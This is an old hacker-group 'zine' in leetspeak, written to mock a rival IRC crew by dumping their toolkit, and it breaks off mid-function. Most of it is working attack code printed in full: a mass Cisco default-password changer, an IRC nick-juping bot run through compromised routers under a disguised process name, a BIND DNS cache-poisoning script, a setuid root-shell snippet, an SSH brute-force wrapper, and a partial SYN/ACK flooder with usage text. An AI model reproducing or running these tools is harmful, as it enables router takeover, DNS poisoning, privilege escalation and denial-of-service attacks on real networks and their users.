#!/local/efnet/el8/pokemon/requers ################################################ ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ### x0x0x x0x0x x0x0x x0x0x x0x0x x0x0x ### ################################################ # # # # # ÛÛÛÛ ÛÛÛÛ # # ÛÛ± ÛÛ ÛÛ± ÛÛ² # # ÛÛÛ ÛÛ ±ÛÛ ±Û° °ÛÛ ÛÛ ÛÛ ±ÛÛ °ÛÛ ÛÛ° # # ÛÛ²ÛÛ ²ÛÛ °Û² °Û²ÛÛ ÛÛ °ÛÛ °Û²ÛÛ° # # ÛÛÛ ²ÛÛ °Û± ÛÛÛ ÛÛ °ÛÛ ÛÛÛ # # °ÛÛÛ± ±ÛÛ ±Û° ÛÛÛ± ÛÛ ±ÛÛ ÛÛÛ± # # ÛÛ°ÛÛ ÛÛ± ÛÛ ²Û°ÛÛ ÛÛ± ÛÛÛ ²Û°ÛÛ² # # ÛÛ² ÛÛ ÛÛÛÛ ²Û² ÛÛ ÛÛÛÛ ²Û² ÛÛ² # # # ################################################ # # # .: first zine :. # # # # [ tribute to efnet el8 requers ] # # # #<><><><><><><><><><><><><><><><><><><><><><><># # # # -= always keeping the secret identify =- # # # #<><><><><><><><><><><><><><><><><><><><><><><># , .::. in efnet el8 PokeMon .;:**' AMC ` 0 .:XHHHHk. db. .;;. dH MX 0 oMMMMMMMMMMM ~MM dMMP :MMMMMR MMM MR ~MRMN QMMMMMb "MMX MMMMMMP !MX' :M~ MMM MMM .oo. XMMM 'MMM `MMMM. )M> :X!Hk. MMMM XMM.o" . MMMMMMM X?XMMM MMM>!MMP 'MMMb.dM! XM M'?M MMMMMX.`MMMMMMMM~ MM MMM XM `" MX MMXXMM ~MMMMM~ XMM. .XM XM`"MMMb.~*?**~ .MMX M t MMbooMM XMMMMMP ?MMM> YMMMMMM! MM `?MMRb. `""" !L"MMMMM XM IMMM MMMX "MMMM" MM ~%: !Mh.""" dMI IMMP 'MMM. IMX ~M!M IMP . 1n7r0 . The Reason.... .. .. 1º. W3 4r3 71r3d 70 533 p4ck375 k1dd135 4nd p30pl3 1f f1nd1n9 70 h4ck3r f0r 7h3r3! .. W3 d3c1d3 7h3n 70 3574bl15h x0x0x, w17h 1n73n710n 0f h4ck 7h3s3 "r3qu3r5" 4nd p057 z1n35 0n 7h3m, d1vul91n9 17'5 b3l0n91n95. ///////////////// /// Lets play! // ///////////////// <<<<<<<<<< Okay... positive! Geting some tools of LABSEC............................. >>>>>>>>>> -> We get all tools about labsec in different boxs and compact in just one .tar.gz, -> and now we will check all files and tools, and show to universe. -> KEEEEEEEEEEEEEEEPING LABSEC EL8 POKEMON!!! ~\-> wget http://myhost.com/labsec.tar.gz --14:07:59-- http://myhost.com/labsec.tar.gz => `labsec.tar.gz' Resolving myhost.com... x0x0x, x0x0x Connecting to myhost.com|x0x0x|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 51,708,710 (49M) [application/x-gzip] 100%[=================================================================================================================>] 48,708,710 1.06M/s ETA 00:00 14:11:42 (1.09 MB/s) - `labsec.tar.gz' saved [48708710/48708710] ~\-> tar -xzvf labsec.tar.gz >> /dev/null & ~\-> cd labsec; ls ./ bit/ dnscp.py ifstat-1.1.tar.gz lol man.tgz monoxide3/ newnick.tgz osshchan/ ../ brute/ dtb* imp* lotus.c mcd* monoxide3.tar.gz openssh-4.4p1/ osshchan.tar.gz ans/ bt.tgz ettercap-NG-0.7.3/ l* lpd/ mcd.c mosdef/ openssh-4.4p1.tgz shells artpack.tgz ciscos/ ettercap-NG-0.7.3.tar.gz labsec-shells lpd.tar.gz metasploit.tar.gz ms3/ openssh-4.7p1/ zlib.4* asc/ cl* flw.c lab.tar.gz manm/ mit.edu newnick-8.4b/ openssh-4.7p1.tar.gz ~\-> cd ans;ls ./ ../ 00-dc.ans 01-duff.ans 01-labsec.ans 01-labsec-t.ans 01-naipe.ans 01-rhythm.ans 02-naipe.ans ~\-> cat 01-labsec.ans ÜÜÜÜ ÜÜÜÜ ÜÛÛ ÜÛß ÜÜÜÜ ÜÛÜÜÜÜÜ Ü ß ÛÛ ÜÜÜÜÜ ÛÛ Û ÛÛÜÜÜ ÛÛ ÛÛÛÛ ÛÛ ÜÜÜÛÛ ÛÛ Û ÛÛÜÜÜÜÜ Ü ÜÜÜÜ ÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛßÛÛßßÛ ÛÛÛÛ ÛÛ ÛÛ Û ÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛÛÛÛ ÛÛÜÜÜÛÛÛ ÛÛÛÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ Û ÛÛ ÛÛÜÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛ ÛÛÛ ßßßßßÛß ßßßß ßßßßÛ ßßßß ÛÛÜÛÛß ßÛÜÜß ßßß ßßßßßßß ßßßßß (((((ELEEEEEEEEEEEEET POKEMON))))) CHECKING BITORNARDO ~\-> cat bst|more #!/usr/bin/env python # Written by Bram Cohen # see LICENSE.txt for license information from BitTornado import PSYCO if PSYCO.psyco: try: import psyco assert psyco.__version__ >= 0x010100f0 psyco.full() except: pass from BitTornado.download_bt1 import BT1Download, defaults, parse_params, get_usage, get_response from BitTornado.RawServer import RawServer, UPnP_ERROR from random import seed from socket import error as socketerror from BitTornado.bencode import bencode from BitTornado.natpunch import UPnP_test from threading import Event from os.path import abspath from sys import argv, version, stdout import sys from sha import sha from time import strftime from BitTornado.clock import clock from BitTornado import createPeerID from BitTornado.ConfigDir import ConfigDir assert version >= '2', "Install Python 2.0 or greater" try: True except: True = 1 False = 0 PROFILER = False def hours(n): if n == 0: return 'complete!' try: n = int(n) assert n >= 0 and n < 5184000 # 60 days except: return '' m, s = divmod(n, 60) h, m = divmod(m, 60) if h > 0: return '%d hour %02d min %02d sec' % (h, m, s) else: return '%d min %02d sec' % (m, s) class HeadlessDisplayer: def __init__(self): self.done = False self.file = '' self.percentDone = '' self.timeEst = '' self.downloadTo = '' self.downRate = '' self.upRate = '' self.shareRating = '' self.seedStatus = '' self.peerStatus = '' self.errors = [] self.last_update_time = -1 def finished(self): self.done = True self.percentDone = '100' self.timeEst = 'Download Succeeded!' self.downRate = '' self.display() def failed(self): self.done = True self.percentDone = '0' self.timeEst = 'Download Failed!' self.downRate = '' self.display() def error(self, errormsg): self.errors.append(errormsg) self.display() def display(self, fractionDone = None, timeEst = None, downRate = None, upRate = None, activity = None, statistics = None, **kws): if self.last_update_time + 0.1 > clock() and fractionDone not in (0.0, 1.0) and activity is not None: return self.last_update_time = clock() if fractionDone is not None: self.percentDone = str(float(int(fractionDone * 1000)) / 10) if timeEst is not None: self.timeEst = hours(timeEst) if activity is not None and not self.done: self.timeEst = activity if downRate is not None: self.downRate = '%.1f kB/s' % (float(downRate) / (1 << 10)) if upRate is not None: self.upRate = '%.1f kB/s' % (float(upRate) / (1 << 10)) if statistics is not None: if (statistics.shareRating < 0) or (statistics.shareRating > 100): self.shareRating = 'oo (%.1f MB up / %.1f MB down)' % (float(statistics.upTotal) / (1<<20), float(statistics.downTotal) / (1<<20)) else: self.shareRating = '%.3f (%.1f MB up / %.1f MB down)' % (statistics.shareRating, float(statistics.upTotal) / (1<<20), float(statistics.downTo tal) / (1<<20)) if not self.done: self.seedStatus = '%d seen now, plus %.3f distributed copies' % (statistics.numSeeds,0.001*int(1000*statistics.numCopies)) else: self.seedStatus = '%d seen recently, plus %.3f distributed copies' % (statistics.numOldSeeds,0.001*int(1000*statistics.numCopies)) self.peerStatus = '%d seen now, %.1f%% done at %.1f kB/s' % (statistics.numPeers,statistics.percentDone,float(statistics.torrentRate) / (1 << 10)) print '\n\n\n\n' for err in self.errors: print 'ERROR:\n' + err + '\n' print 'saving: ', self.file print 'percent done: ', self.percentDone print 'time left: ', self.timeEst print 'download to: ', self.downloadTo print 'download rate: ', self.downRate print 'upload rate: ', self.upRate print 'share rating: ', self.shareRating print 'seed status: ', self.seedStatus print 'peer status: ', self.peerStatus stdout.flush() def chooseFile(self, default, size, saveas, dir): self.file = '%s (%.1f MB)' % (default, float(size) / (1 << 20)) if saveas != '': default = saveas self.downloadTo = abspath(default) return default def newpath(self, path): self.downloadTo = path def run(params): try: import curses curses.initscr() cols = curses.COLS curses.endwin() except: cols = 80 h = HeadlessDisplayer() while 1: configdir = ConfigDir('downloadheadless') defaultsToIgnore = ['responsefile', 'url', 'priority'] configdir.setDefaults(defaults,defaultsToIgnore) configdefaults = configdir.loadConfig() defaults.append(('save_options',0, "whether to save the current options as the new default configuration " + "(only for btdownloadheadless.py)")) try: config = parse_params(params, configdefaults) except ValueError, e: print 'error: ' + str(e) + '\nrun with no args for parameter explanations' break if not config: print get_usage(defaults, 80, configdefaults) break if config['save_options']: configdir.saveConfig(config) ................................................ ................................................ ................................................ ...................BIG CODE..................... ................................................ ................................................ ............. we will share this complete code!! ~\-> cd brute; ls ./ ../ br2/ br2.tar.gz host.pl locaweb/ locaweb.tar.gz ~\-> cd br2;ls ./ sshb103* sshb116* sshb129* sshb141* sshb154* sshb167* sshb18* sshb192* sshb205* sshb33* sshb46* sshb59* sshb71* sshb84* sshb97* ../ sshb104* sshb117* sshb13* sshb142* sshb155* sshb168* sshb180* sshb193* sshb206* sshb34* sshb47* sshb6* sshb72* sshb85* sshb98* all* sshb105* sshb118* sshb130* sshb143* sshb156* sshb169* sshb181* sshb194* sshb21* sshb35* sshb48* sshb60* sshb73* sshb86* sshb99* duh.sh sshb106* sshb119* sshb131* sshb144* sshb157* sshb17* sshb182* sshb195* sshb22* sshb36* sshb49* sshb61* sshb74* sshb87* orb* sshb107* sshb12* sshb132* sshb145* sshb158* sshb170* sshb183* sshb196* sshb23* sshb37* sshb5* sshb62* sshb75* sshb88* ptscan.dat sshb108* sshb120* sshb133* sshb146* sshb159* sshb171* sshb184* sshb197* sshb24* sshb38* sshb50* sshb63* sshb76* sshb89* sc* sshb109* sshb121* sshb134* sshb147* sshb16* sshb172* sshb185* sshb198* sshb25* sshb39* sshb51* sshb64* sshb77* sshb9* ss* sshb11* sshb122* sshb135* sshb148* sshb160* sshb173* sshb186* sshb199* sshb26* sshb4* sshb52* sshb65* sshb78* sshb90* sshb0* sshb110* sshb123* sshb136* sshb149* sshb161* sshb174* sshb187* sshb2* sshb27* sshb40* sshb53* sshb66* sshb79* sshb91* sshb1* sshb111* sshb124* sshb137* sshb15* sshb162* sshb175* sshb188* sshb20* sshb28* sshb41* sshb54* sshb67* sshb8* sshb92* sshb10* sshb112* sshb125* sshb138* sshb150* sshb163* sshb176* sshb189* sshb201* sshb29* sshb42* sshb55* sshb68* sshb80* sshb93* sshb100* sshb113* sshb126* sshb139* sshb151* sshb164* sshb177* sshb19* sshb202* sshb3* sshb43* sshb56* sshb69* sshb81* sshb94* sshb101* sshb114* sshb127* sshb14* sshb152* sshb165* sshb178* sshb190* sshb203* sshb30* sshb44* sshb57* sshb7* sshb82* sshb95* sshb102* sshb115* sshb128* sshb140* sshb153* sshb166* sshb179* sshb191* sshb204* sshb31* sshb45* sshb58* sshb70* sshb83* sshb96* // ripped bruteforce ~\-> cat duh.sh #!/bin/sh # SHELLSCRIPT PARA FAZER O XUPETA SSH RODA JeRAL # CODADO POR klux@efnet klux@LABSEC echo "Escreva o nome do arquivo: " read file; echo "Escreva a quantidade de arquivos: " read qtidade; echo "Arquivo xupeta pra roda jeral flw: " read nomeresult; for ((d=1 ; d <= $qtidade; d++)); do echo "./$file$d" -brute '$1' >> $nomeresult ; done (((((((((((((( OFMGGGGGG GOOOOOOOOOOOOOOOOOD CODE MAN!!! LOLLLLLLL )))))))))))))) ~\-> cd ../ciscos;ls ./ ../ ciscos.txt lep.pl names.txt pressure2.pl pressure.pl readme servers.txt ~\-> cat lep.pl #!/usr/bin/perl # # LEPARKOUR I by labsec@efnet (LsC) # CISCO/ROUTER MASS PASSWD CHANGER # use Net::Telnet::Cisco; # usar em background: 0 # usar em foreground: 1 # um mostra as coisas na tela(1) e o outro nao(0) eh isso e ja era use constant DEBUG => 1; # senha cisco padrao my $padrao = "cisco"; # senha cisco para alterar my $mudar = "cisco"; # nao mexer my $i = 0; my $deu = 0; my $ARGC = @ARGV; my $banner = "\nLEPARKOUR I. by LsC [CISCO/ROUTER MASS PASSWD CHANGER]\n"; if ($ARGC !=1) { print $banner; print "Usage: $0 [list.txt]\n\n"; exit; } print $banner; open ("arq", "$ARGV[0]") or die("[LABSEC] $ARGV[0] nao encontrado\n"); @linhas = (); foreach $linha (@linhas) { chomp(@linhas); if (DEBUG == 1) { print "\n[+] Tentando $linha:23 ($i/$#linhas)\n"; } if (my $session = Net::Telnet::Cisco->new(Host => $linha, Timeout => '5', Errmode => "return")) { $session->errmode("return"); if ($session->login(Password => $padrao, Timeout => '5')) { if (DEBUG == 1) { print "[+] Aceito a senha..\n"; } if ($session->enable($padrao)) { $session->cmd('configure terminal'); $session->cmd('line vty 0 4'); $session->cmd('password '.$mudar); $session->cmd('exit'); $session->cmd('exit'); my @out = $session->cmd('copy run start'); # $session->cmd('startup-config'); foreach (@out) { if ($_ =~ /OK/ig) { if (DEBUG == 1) { print "[+] >> $linha:23 deu certo manow\n"; } system("echo ".$linha." >> alterados.txt"); $deu++; } } } else { if (DEBUG == 1) { print "[-] Erro (enable): Senha errada?\n"; } $erro++; } } else { if (DEBUG == 1) { print "[-] Erro: Senha padrao errada?\n"; } $erro++; } $session->close; } else { if (DEBUG == 1) { print "[-] Erro: Cisco offline.\n"; } $erro++; } $i++; } close("arq"); if (DEBUG == 1) { print qq~\nFim! Total de ciscos com senhas alteradas: $deu Total de ciscos com erro de senha no enable: $erro\n~; } ======= === For this reason this is a el8 pokemon group!!!! === Check the next lame kid code.. LOLLLLLLLLLLLLLL ======= ~\-> cat pressure2.pl #!/usr/bin/perl # [LsC] pressure # [LsC] cisco+irc juper # beta 1 # i dont want kids ripping, so im gonna use perl2exe. # by klux $SIG{HUP} = 'IGNORE'; $SIG{PS} = 'IGNORE'; $SIG{TERM} = 'IGNORE'; $SIG{CHLD} = sub { wait; }; $ARGC=@ARGV; my $pid = fork(); die "ERROR: I could not fork() the process." unless defined($pid); exit if $pid; if ($ARGC !=1) { print "PRESSURE I. by LsC [CISCO/ROUTER JupeNet - IRC Nick Juper]\n"; print "LICENSED and CONFIGURED to: klux\n"; print "Usage: pressure [target]\n"; print " names.txt \n"; print " ciscos.txt \n"; print " servers.txt \n"; print "PRESSURE is private, if you want pressure, #lsc at efnet.\n"; exit(1); } my $senha="reef666"; my $port="6667"; my $chan="#lala"; my $senhachan="rem"; my $owner= "klux"; my $procname="proftpd: [IDLE]"; $0 = $procname . "\0"; $target = $ARGV[0] if ($ARGV[0]); $id ="$ident".int rand(20); $0 = $procname . "\0"; $chan = '#'.$chan if ($chan !~ /^\#/); $nick = retorna_nomes(); $nick2 = retorna_ident(); $cisco = retorna_ciscos(); $server = retorna_servers(); $name = retorna_realn(); $ident = retorna_ident(); $nick3 = "$nick".int rand(20); $nick4 = "$nick2".int rand(20); use IO::Socket; $sock=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=> $cisco, PeerPort=> 23); print $sock "".$senha."\n"; print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$ident." LsC LsC :".$name."\n"; while (<$sock>) { print; if (/^:.+?\s433\s/) { # nick already in use print $sock "NICK ".$nick4."\n"; } if (/^:.+?\s376\s/) { # end of motd print $sock "PRIVMSG ".$owner." : [LsC] PRESSURE : connected to $server:$port\n"; print $sock "PRIVMSG ".$owner." : [LsC] TARGET : pointed to $target\n"; print $sock "PRIVMSG ".$owner." : [LsC] !HELP : for help\n"; print $sock "JOIN ".$chan." ".$senhachan." : ENTRANDO NO CANAL\n"; } if(/^PING :(.*)/){ #replying the ping print $sock "PONG :$1\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!raw (.*)/){ print $sock "$1"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!help(.*)/){ print $sock "PRIVMSG ".$owner." : [LsC] !RAW\n"; print $sock "PRIVMSG ".$owner." : [LsC] !MSG\n"; print $sock "PRIVMSG ".$owner." : [LsC] !OWNER : nick\n"; print $sock "PRIVMSG ".$owner." : [LsC] !TARGET : nick\n"; print $sock "PRIVMSG ".$owner." : [LsC] !QUIT\n"; print $sock "PRIVMSG ".$owner." : [LsC] !STATS\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!msg(.*)/){ print $sock "PRIVMSG ".$1." : ".$2."\n"; } if(/^\:$target!.*\@.*QUIT.*(.*)/){ print $sock "NICK ".$target."\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET has been taken.\n"; } if(/^\:$target!.*\@.*NICK.*(.*)/){ print $sock "NICK ".$target."\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET has been taken.\n"; } if(/^ERROR :(.*)/){ print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$ident." LsC LsC : ".$name."\n"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!quit(.*)/){ die "[LsC] ultimate jupe teknology\n"; } if(/^\:.*: Connection timed out(.*)/){ print STDOUT "[LsC] CONNECTION timed out (DDOS?). Reconnecting\n"; print $sock "telnet ".$server." ".$port."\n"; print $sock "NICK ".$nick."\n"; print $sock "USER ".$id." LsC LsC : ".$name."\n"; print $sock "PRIVMSG ".$owner." : [LsC] CONNECTION has timed out... DDOS ? r3r3r3"; } if(/^\:$owner!.*\@.*PRIVMSG.*:!stats(.*)/){ print $sock "PRIVMSG ".$owner." :[LsC] PRESSURE Stats\n"; print $sock "PRIVMSG ".$owner." :[LsC] SERVER : $server\n"; print $sock "PRIVMSG ".$owner." :[LsC] PORT : $port\n"; print $sock "PRIVMSG ".$owner." :[LsC] TARGET : $target\n"; print $sock "PRIVMSG ".$owner." :[LsC] OWNER : $owner\n"; print $sock "PRIVMSG ".$chan." :[LsC] TARGET is $target\n"; } if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!target\s+(.*)/ ){ $target =$1; $target =~ s/ //; $target =~ s/\r$//; $target =~ s/\n$//; print $sock "PRIVMSG ".$owner." :[LsC] TARGET : pointed to $target\n"; } if(/^\:$secc!.*\@.*PRIVMSG.*:!escap(.*)/){ print $sock "$1"; } if(/^\:$target!.*\@.*\s+QUIT\s+/){ print $sock "NICK $target\n"; } if( /^\:$owner!.*\@.*\s+PRIVMSG.*:!owner\s+(.*)/ ){ $owner =$1; $owner =~ s/ //; $owner =~ s/\r$//; $owner =~ s/\n$//; print $sock "PRIVMSG ".$owner." :[LsC] PRESSURE\n"; print $sock "PRIVMSG ".$owner." :[LsC] TRY !HELP\n"; } } sub retorna_nomes { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_ciscos { open (a, "ciscos.txt") or die("[LsC] ciscos.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_servers { open (a, "servers.txt") or die("[LsC] servers.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_realn { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } sub retorna_ident { open (a, "names.txt") or die("[LsC] names.txt not found\n"); @linhas = (); chomp(@linhas); $n = int(rand(@linhas)); close(a); return @linhas[$n]; } ******************************************************** *************** NAMED EXPLOIT !?!?!?!? ***************** ******************************************************** \-> cat dnscp.py #!/usr/bin/env python """ DNS Cache Poison v0.3beta by posedge / Coromputer http://www.coromputer.net/ based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html output: ::: id: q: g: e: id: ID to predict q: number of queries from the DNS server (only queries with LSB at 0 in ID) g: number of good predicted IDs e: number of errors while trying to predict a *supposed to be* predicted ID """ import socket, select, sys, time from struct import unpack, pack from socket import htons _ANSWER_TIME_LIMIT = 1.0 # 1sec _NAMED_CONF = [['ns2.globalwebhost.com','63.210.101.2'], \ ['ns2.globalwebhost.com','63.210.101.2'], \ ['0','0']] class BINDSimplePredict: def __init__(self, txid, bind_9_2_3___9_4_1=True): self.txid = txid self.cand = [] if bind_9_2_3___9_4_1 == True: # For BIND9 v9.2.3-9.4.1: self.tap1=0x80000057 self.tap2=0x80000062 else: # For BIND9 v9.0.0-9.2.2: self.tap1=0xc000002b # (0x80000057>>1)|(1<<31) self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31) self.next = self.run() return def run(self): if (self.txid & 1) != 0: #print "info: LSB is not 0. Can't predict the next transaction ID." return False #print "info: LSB is 0, predicting..." # One bit shift (assuming the two lsb's are 0 and 0) for msb in xrange(0, 2): self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF) # Two bit shift (assuming the two lsb's are 1 and 1) # First shift (we know the lsb is 1 in both LFSRs): v=self.txid v=(v>>1)^self.tap1^self.tap2 if (v & 1) == 0: # After the first shift, the lsb becomes 0, so the two LFSRs now have # identical lsb's: 0 and 0 or 1 and 1 # Second shift: v1=(v>>1) # 0 and 0 v2=(v>>1)^self.tap1^self.tap2 # 1 and 1 else: # After the first shift, the lsb becomes 1, so the two LFSRs now have # different lsb's: 1 and 0 or 0 and 1 # Second shift: v1=(v>>1)^self.tap1 # 1 and 0 v2=(v>>1)^self.tap2 # 0 and 1 # Also need to enumerate over the 2 msb's we are clueless about for msbits in xrange(0, 4): self.cand.append(((msbits<<14)|v1) & 0xFFFF) self.cand.append(((msbits<<14)|v2) & 0xFFFF) return True; class DNSData: def __init__(self, data): self.data=data self.name='' for i in xrange(12, len(data)): self.name+=data[i] if data[i] == '\x00': break q_type = unpack(">H", data[i+1:i+3])[0] if q_type != 1: # only type: A (host address) allowed. self.name = None return def response(self, ip=None): packet='' packet+=self.data[0:2] # id packet+="\x84\x10" # flags packet+="\x00\x01" # questions packet+="\x00\x01" # answer RRS packet+="\x00\x00" # authority RRS packet+="\x00\x00" # additional RRS packet+=self.name # queries: name packet+="\x00\x01" # queries: type (A) packet+="\x00\x01" # queries: class (IN) packet+="\xc0\x0c" # answers: name if ip == None: packet+="\x00\x05" # answers: type (CNAME) packet+="\x00\x01" # answers: class (IN) packet+="\x00\x00\x00\x01" # answers: time to live (1sec) packet+=pack(">H", len(self.name)+2) # answers: data length packet+="\x01" + "x" + self.name # answers: primary name else: packet+="\x00\x01" # answers: type (A) packet+="\x00\x01" # answers: class (IN) packet+="\x00\x00\x00\x01" # answers: time to live (1sec) packet+="\x00\x04" # answers: data length packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # IP #packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional return packet class DNSServer: def __init__(self): self.is_r = [] self.is_w = [] self.is_e = [] self.targets = [] self.named_conf = [] for i in xrange(len(_NAMED_CONF)): start = 0 tmp = '' for j in xrange(len(_NAMED_CONF[i][0])): if _NAMED_CONF[i][0][j] == '.': tmp += chr(j - start) tmp += _NAMED_CONF[i][0][start:j] start = j + 1 tmp += chr(j - start + 1) tmp += _NAMED_CONF[i][0][start:] + "\x00" self.named_conf.append([tmp, _NAMED_CONF[i][1]]) return def run(self): self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.s.bind(('',53)) self.is_r.append(self.s) next = False i = 0 while 1: r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0) if r: try: data, addr = self.s.recvfrom(1024) except socket.error: continue txid = unpack(">H", data[0:2])[0] p=DNSData(data) if p.name == None: continue found = False for j in xrange(len(self.named_conf)): if p.name == self.named_conf[j][0]: found = True break if found == True: self.s.sendto(p.response(self.named_conf[j][1]), addr) continue # FIXME: wrong code, 'i' is 0 at begin and when 1 item in list... for i in xrange(len(self.targets)): if self.targets[i][0] == addr[0]: break if i == len(self.targets): self.targets.append([addr[0], False, time.time(), [None, None], \ None, 0, 0, 0]) if self.targets[i][1] == False: bsp = BINDSimplePredict(txid) self.targets[i][1] = bsp.next self.targets[i][3][0] = bsp.cand bsp = BINDSimplePredict(txid, False) self.targets[i][3][1] = bsp.cand else: if p.name == self.targets[i][4]: elapsed = time.time() - self.targets[i][2] if elapsed > _ANSWER_TIME_LIMIT: print 'info: slow answer, discarding (%.2f sec)' % elapsed else: self.targets[i][5] += 1 found_v1 = False found_v2 = False for j in xrange(10): if self.targets[i][3][0][j] == txid: found_v1 = True break if self.targets[i][3][1][j] == txid: found_v2 = True break if found_v1 == True or found_v2 == True: self.targets[i][6] += 1 else: self.targets[i][7] += 1 # TODO: if found_v1 or found_v2 is True, then show bind version! print "\n" + str(i) + ' target:', self.targets print '%f:%s:%d: id: %04x q: %d g: %d e: %d' % (time.time(), \ addr[0], addr[1], txid, self.targets[i][5], \ self.targets[i][6], self.targets[i][7]) self.targets[i][1] = False self.targets[i][2] = time.time() self.targets[i][4] = "\x01" + "x" + p.name self.s.sendto(p.response(), addr) return def close(self): self.s.close() return if __name__ == '__main__': dns_srv = DNSServer() try: dns_srv.run() except KeyboardInterrupt: print 'ctrl-c, leaving...' dns_srv.close() /\ || ((( PUBLIC SHIT ))) """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" ""````````COOOOOOOOOOOOOOOLLLL U KNOW SUID FILE!!!!!´´´´´´´´´´´"" ~\-> cd..; cat flw.c|more int main(void) { setgid(0); setuid(0); execl("/bin/sh","sh",0); } """"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""" ==================================================================== = = = ,================================. = = / _______ ___________ \ = = | ## | o o | |_|_|__|_|__| ## | = = | #### |_,---._| ||| #### | = = | ## (o) (O)+++ ## |`--.__ = = \__________________________________/ hjw \,--[= = = '=' '=' `97 = = = ==================================================================== = = = = = OHHHHHHHHHHH U HAVE PACKET POWERRRRRRRRR ???? = = = ======================================================================= = = = = = ~\-> ./l = = [L]OTUS I. by LabSec [SYN/ACK Packet flooder] = = Usage: ./l [source] [destination] [bport] [eport] [type] [timeout] = = = = | = = |-- source class/ip (0 = random) = = destination host/ip (no default) = = begin port (1-65535 ) = = end port (1-65535 ) = = type [1:SYN, 2:ACK] (no default) = = timeout (no default) = = = ======================================================================= + + + + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + + + ~\-> ./imp + + imp.c (v.331) by sinkhole - Proof of Concept for private educational use only + + -PRIVATE- REGISTERED FOR: pnt + + + + WARNING: Using this program on public networks + + is HIGHLY illegal and they WILL find you and put + + you in jail. The author is no way responsible for + + your actions. Keep this one to your local network! + + + + Usage: ./imp [seconds to run for] + + src ip block = a block of computers, ie: 10.32.8 (put 0 for random) + + -Note: random only works on misconfigured networks now-a-days. + + dst computer = computer to receive the packets. + + begin port = port to begin flooding, ie: 1 + + end port = last port to flood, ie: 150 + + types = 1=SYN 2=ACK 3=FIN 4=RST + + seconds to run = If not specified it will run until killed. + + + + Ie: ./imp 10.223 10.2.0.1 1 150 1 30 + + + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \-> cat lotus.c|more /* [L]OTUS.C by labsec team */ #include #include #include #include #include #include #include #include #include #include unsigned long rend, stawp; int pkttype, datapipe; time_t startt, endt; char version[5]; void die() { unsigned long ks; int temp; endt=time(0); temp=(endt - startt); if(temp == 0) temp=1; ks=((rend * 54) / temp); fprintf(stderr, " %d packets sent in %d seconds\n", rend, (endt-startt), (ks / 1024)); fprintf(stderr, " %d kbyte/s\n", (ks / 1024)); alarm(0); exit(1); } void usage(char *program) { fprintf(stderr, "[L]OTUS I. by LabSec [SYN/ACK Packet flooder]\n"); fprintf(stderr, "Usage: %s [source] [destination] [bport] [eport] [type] [timeout]\n", program); fprintf(stderr, "\n"); fprintf(stderr, " |\n"); fprintf(stderr, " |-- source class/ip (0 = random)\n"); fprintf(stderr, " destination host/ip (no default)\n"); fprintf(stderr, " begin port (1-65535 )\n"); fprintf(stderr, " end port (1-65535 )\n"); fprintf(stderr, " type [1:SYN, 2:ACK] (no default)\n"); fprintf(stderr, " timeout (no default)\n"); fprintf(stderr, "\n"); exit(1); } unsigned short ip_sum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } unsigned long getaddr(char *name) { struct hostent *hep; hep=gethostbyname(name); if(!hep) { fprintf(stderr, "unknown host %s\n", name); exit(1); } return *(unsigned long *)hep->h_addr; } void send_tcp_pkt(struct ip *ih, struct tcphdr *th, char *data, int dlen) { char buf[65536]; struct { unsigned long saddr, daddr; char mbz; char ptcl; unsigned short tcpl; } ph; struct sockaddr_in sin; ph.saddr=ih->ip_src.s_addr; ph.daddr=ih->ip_dst.s_addr; ph.mbz=0; ph.ptcl=IPPROTO_TCP; ph.tcpl=htons(sizeof(*th)+dlen); memcpy(buf, &ph, sizeof(ph)); memcpy(buf+sizeof(ph), th, sizeof(*th)); memcpy(buf+sizeof(ph)+sizeof(*th), data, dlen); memset(buf+sizeof(ph)+sizeof(*th)+dlen, 0, 4); th->th_sum=ip_sum(buf, (sizeof(ph)+sizeof(*th)+dlen+1)&~1); memcpy(buf, ih, 4*ih->ip_hl); 